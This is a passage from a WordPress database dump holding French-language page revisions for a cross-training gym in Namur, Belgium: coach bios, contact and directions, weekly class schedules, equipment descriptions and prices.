alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-36', '', '', '2013-07-10 15:47:02', '2013-07-10 15:47:02', '', 20, 'http://www.crosstrainingcenter.be/20-revision-36/', 0, 'revision', '', 0),
(337, 1, '2013-07-11 07:03:58', '2013-07-11 07:03:58', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>&nbsp;</h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-11 07:03:58', '2013-07-11 07:03:58', '', 9, 'http://www.crosstrainingcenter.be/9-revision-20/', 0, 'revision', '', 0),
(339, 1, '2013-07-25 16:36:46', '2013-07-25 16:36:46', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-25 16:36:46', '2013-07-25 16:36:46', '', 11, 'http://www.crosstrainingcenter.be/11-revision-114/', 0, 'revision', '', 0),
(358, 1, '2013-11-01 08:57:20', '2013-11-01 08:57:20', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines. hola ti quiero</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebell</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-11-01 08:57:20', '2013-11-01 08:57:20', '', 22, 'http://www2.crosstrainingcenter.be/22-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(344, 1, '2013-08-23 08:46:17', '2013-08-23 08:46:17', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-08-23 08:46:17', '2013-08-23 08:46:17', '', 11, 'http://www.crosstrainingcenter.be/11-revision-115/', 0, 'revision', '', 0),
(346, 1, '2013-10-05 08:39:04', '2013-10-05 08:39:04', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\">18h<br>TRX</td>\r\n<td class=\"tcellule\">17h30<br>CARDIO</td>\r\n<td class=\"tcellule\">18h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">17h30<br>GLFE</td>\r\n<td class=\"tcellule\">17h30<br>TRX</td>\r\n<td class=\"tcellule\">17h30<br>TRX</td>\r\n<td class=\"tcellule\">11h<br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\">18h30<br>GLFE</td>\r\n<td class=\"tcellule\">18h15<br>TRX</td>\r\n<td class=\"tcellule\">18h30<br>CARDIO</td>\r\n<td class=\"tcellule\">18h15<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">18h15<br>GLFE</td>\r\n<td class=\"tcellule\">11h30<br>GLFE</td>\r\n<td class=\"tcellule\">11h30<br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\">19h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">19h<br>GLFE</td>\r\n<td class=\"tcellule\">19h<br>TRX</td>\r\n<td class=\"tcellule\">19h<br>CARDIO</td>\r\n<td class=\"tcellule\">19h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">12h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">12h<br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\">19h45<br>CARDIO</td>\r\n<td class=\"tcellule\">19h30<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">19h45<br>GLFE</td>\r\n<td class=\"tcellule\">19h15<br>TRX</td>\r\n<td class=\"tcellule\">19h45<br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les 